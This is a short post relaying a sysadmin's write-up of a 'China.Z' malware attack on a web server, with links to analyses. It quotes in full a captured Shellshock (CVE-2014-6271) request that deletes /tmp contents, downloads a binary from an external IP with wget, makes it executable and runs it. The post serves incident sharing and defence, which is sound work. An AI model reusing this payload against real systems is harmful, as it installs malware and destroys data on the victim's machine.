China.z Malware info

My prod server got a security issue where below show the same case:

From :http://users.jyu.fi/~sapekiis/china-z/index.html

China.Z Malware

Among the daily attacks on my web server, I got a request for the following file (without the line breaks).

() { :; }; /bin/bash -c "
rm -rf /tmp/*;
echo wget http://121.207.230.74:911/24 -O /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo echo By China.Z >> /tmp/Run.sh;
echo chmod 777 /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;
/tmp/Run.sh
"

It was clearly an attempt to exploit CVE-2014-6271 and friends, colloquially known as Shellshock or Bashdoor. That is not particularly interesting, because the bug was fixed a long time ago and my server does not even support CGI. However some searching revealed that the payload does not seem to be known.

I set up a trap and captured the payload the next time it came by. On a cursory glance it looked like a poorly-written C++ program that was compiled with a 2003 version of GCC on a RHEL machine.

I do not care to dig much deeper, so I am sharing the payload with the world in case someone does. I put the payload and the accompanying the request into an archive. Note that the payload is most definitely harmful and you need to be really careful if you decide to work with it. I removed its execute bits as a precaution, but the rest is on you.

also,you can follow the pages as workround guide:

1.http://www.slideshare.net/hendrikvb/chinaz-analysis-of-a-hack

2.http://blog.malwaremustdie.org/2015/01/mmd-0030-2015-new-elf-malware-on.html

3.http://blog.malwaremustdie.org/2015/06/the-elf-chinaz-reloaded.html

–EOF–